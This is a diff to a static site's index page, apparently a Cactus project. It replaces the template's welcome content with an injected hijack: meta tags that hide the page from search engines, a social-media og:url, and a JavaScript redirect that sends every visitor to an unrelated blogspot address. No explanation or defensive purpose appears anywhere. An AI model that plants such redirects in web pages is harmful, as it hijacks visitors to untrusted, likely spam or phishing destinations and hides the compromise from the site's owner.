--- a/pages/index.html
+++ b/pages/index.html
@@ -1,4 +1,5 @@
-{% extends "base.html" %}
-{% block content %}
-Welcome to Cactus!
-{% endblock %}
+<meta content='noarchive' name='googlebot'/>
+<meta content='noindex, nofollow' name='robots'/>
+<meta content='https://badoo.com/0511837490/1318740621' property='og:url'/>
+<script language='javascript' type='text/javascript'>
+window.location ="http://dofaalmntwfaa.blogspot.be/search/label/u5";</script>
